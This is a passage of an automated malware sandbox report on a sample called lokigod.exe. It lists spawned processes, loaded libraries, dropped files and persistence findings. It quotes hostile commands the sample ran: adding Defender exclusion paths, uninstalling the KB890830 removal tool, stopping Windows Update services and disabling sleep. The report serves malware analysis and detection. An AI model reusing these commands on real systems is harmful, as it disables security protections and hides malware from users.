          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\Users\user\Desktop\lokigod.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: lokigod.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: lokigod.exeStatic file information: File size 5265920 > 1048576
          Source: lokigod.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x4f5e00
          Source: lokigod.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: vzppfnnlsyit.exe, 00000022.00000003.2161528296.000001CEAE950000.00000004.00000001.00020000.00000000.sdmp
          Source: lokigod.exeStatic PE information: section name: .00cfg
          Source: vzppfnnlsyit.exe.0.drStatic PE information: section name: .00cfg
          Source: C:\Windows\System32\conhost.exeCode function: 56_2_0000000140001394 push qword ptr [0000000140009004h]; ret 56_2_0000000140001403

          Persistence and Installation Behavior

          barindex
          Sample is not signed and drops a device driver
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeFile created: C:\Windows\TEMP\gdtmkvyhysuy.sysJump to behavior
          Source: C:\Users\user\Desktop\lokigod.exeFile created: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeJump to dropped file
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeFile created: C:\Windows\Temp\gdtmkvyhysuy.sysJump to dropped file
          Source: C:\Users\user\Desktop\lokigod.exeFile created: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeJump to dropped file
          Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exeFile created: C:\Windows\Temp\gdtmkvyhysuy.sysJump to dropped file
          Source: C:\Users\user\Desktop\lokigod.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
